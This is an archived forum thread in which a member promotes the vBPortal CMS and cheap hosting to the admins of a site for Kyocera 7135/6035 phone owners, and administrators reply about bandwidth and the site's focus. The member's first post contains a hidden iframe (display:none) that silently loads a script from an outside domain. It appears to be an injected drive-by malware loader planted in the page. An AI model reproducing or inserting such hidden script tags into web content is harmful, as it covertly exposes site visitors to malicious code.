+ Reply to Thread
    AJR

Time to have more than a "forum" here...

Hey everyone... been coming here for quite awhile and post when I can. I have received many useful tips, tricks, and ideas for my 7135 which I love to pieces!

I think there's enough members here to really make this a great community. Should the admins want to improve upon the site and make it more than just forums, a great CMS to look at is vBPortal (http://www.vbportal.com). I am part of the development team there now working on vBPortal Plus, which has some really great features that would make this more of a full-blown community such as:

• Active Topics
    • AvantGo
    • Classifieds
    • Content Manager
    • Downloads
    • Encyclopedia
    • FAQ
    • Feedback
    • Glossary
    • Journal
    • News
    • Newsletter
    • Recommend Us
    • Reviews
    • Search
    • Sections
    • Statistics
    • Top 10
    • Top Sites
    • WebChat
    • Web Links

It integrates very will with vBulletin 2.3.x and everyone will love the additional features added to the site! I highly recommend vBPortal, and not just cause I'm on the dev team. I used it for 2 years before I joined with them last month! This is not an advertisement, but a suggestion to the admins here at SPS! Take a look and see what you think!

AJ<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤
    AJ -
    AJ's VPinMAME Table Downloads
    VPForums
    - = Play pinball on your PC for free = -

Administrator
    i cant speak for the bosses but thie site is solely for the 7135/6035. the things you mention are nice but that will surely increase bandwidth and costs to the bosses and im not sure that is the direction they are ready to go in.

as you know this site had some changes that were good just before the crash of '03 and once JJ gets other maters taken care of he will work on the many things needed to bring the site back to full speed.

again i cant speak for the big boss but im just going by what the focus of the board is...

AJR
    Well, I'm not sure what the bosses are paying monthly for this site, but if they're reading this and worried about bandwidth/space and cost, I could offer them right now:

1.0GB Space
    100GB Bandwidth
    3 MySQL DBs
    500 Email accounts

...on a server with only 5 other sites so it's fast and has no load for only $35/month. PHP 4.2.1, 3 MySQL DBs, Web Based and POP3 email, gzip compression, phpAccelerator, access to their raw log files, and weekly backups of the MySQL database.

Adding vBPortal to this site would give you, the member, the ability to have:

• Reviews of products for the 6035/7135
    • Links section for all the programs to use with rating capability
    • Downloads section for ringers, programs, etc
    • Full blown Classifieds Section with photos
    • Java-based Chat Room
    • True FAQ area for great "How-To-Do's" on the 6035/7135
    • A Palm interface with the AvantGo module
    • 7 Languages for the Portal
    • A true newsletter signup
    • Custom Menu's
    • Easy Style Additions
    • and more...

I would just like to see this site keep growing! I'm sure donations would more than cover the $35/month site costs. Maintenance of vBPortal is no more than vBulletin! It's just a viable solution to have more things to see and do when you come to SPS!!!
    AJ -
    AJ's VPinMAME Table Downloads
    VPForums
    - = Play pinball on your PC for free = -

good thing this isn't an ad...

n/m

Administrator
    if you want to discuss this with jimmyjoe, the please PM him.